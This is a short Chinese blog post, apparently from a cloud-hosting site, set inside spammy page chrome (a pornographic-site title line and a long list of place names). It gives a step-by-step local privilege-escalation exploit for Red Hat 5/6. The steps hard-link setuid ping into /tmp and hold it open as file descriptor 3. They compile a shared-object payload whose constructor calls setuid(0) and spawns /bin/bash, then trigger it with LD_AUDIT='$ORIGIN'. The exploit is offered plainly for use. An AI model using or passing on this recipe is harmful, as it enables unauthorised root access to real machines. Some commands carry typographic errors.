中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Redhat利用漏洞提權

發布時間:2020-07-21 12:41:09 來源:網絡 閱讀:4589 作者:jikecom 欄目:安全技術

漏洞試用系統:redhat 56通用

 

.利用/tmp擁有777的權限

/tmp下創建一個exploit目錄

 

ln   /bin/pingping命令的權限很特殊是S,可以在普通用戶使用這個命令的時候瞬間擁有這個命令的屬主權限,這里是root

 

ln /bin/ping  /tmp/exploit/target

exec  3<  /tmp/exploit/target

rm  -rf  /tmp/exploit/


 

 

.vim編寫一段C語言程序(文件名payload.c

 

void  __attribute__((constructor))  init()  //這里__是兩個下劃線

{

         setuid(0);

         system(“/bin/bash”);

}


 

使用GCC把這個文件編譯一下

 

Gcc -w –fpic –shared –o /tmp/exploit payload.c

 

 

.執行

 

LD_AUDIT=”\$ORIGIN”  exec/proc/self/fd/3


向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

新宁县| 玉山县| 常熟市| 岳阳县| 上饶市| 阳东县| 乌审旗| 巧家县| 南安市| 石渠县| 沧州市| 许昌市| 山西省| 克山县| 滕州市| 左贡县| 福贡县| 井陉县| 杨浦区| 鹤山市| 芦山县| 都江堰市| 天水市| 金坛市| 乾安县| 石城县| 嘉荫县| 双江| 汽车| 石渠县| 福建省| 循化| 罗江县| 广汉市| 和平县| 铅山县| 镇坪县| 松江区| 巴中市| 靖边县| 长子县|